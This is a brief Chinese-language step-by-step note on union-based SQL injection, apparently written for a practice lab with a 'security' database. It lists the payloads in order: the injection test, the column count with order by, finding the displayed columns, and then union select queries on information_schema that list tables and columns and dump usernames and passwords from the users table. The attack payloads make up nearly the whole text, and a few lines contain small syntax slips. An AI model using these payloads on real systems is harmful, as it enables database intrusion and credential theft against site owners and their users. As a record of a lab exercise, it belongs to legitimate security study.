1.判断有无注入点
id=1 and 1=1/随便写看有无报错
发现有注入点
2.猜解列名数量order by方便union联合查询前后一致
通过报错发现字段只有四列
3.判断回显点
联合查询union
发现回显到login and password 回显的为2,3
4.在回显点处收集信息union select 1,version(),database()
1)搜集数据库版本与库名
2)查找
tablename union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'
3)用户信息可能保存在users中
union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
5.查询到表的列名信息关键用户名和账号
union select 1,2,(select groupconcat(username,0x3a,password)from users)
成功回显用户名密码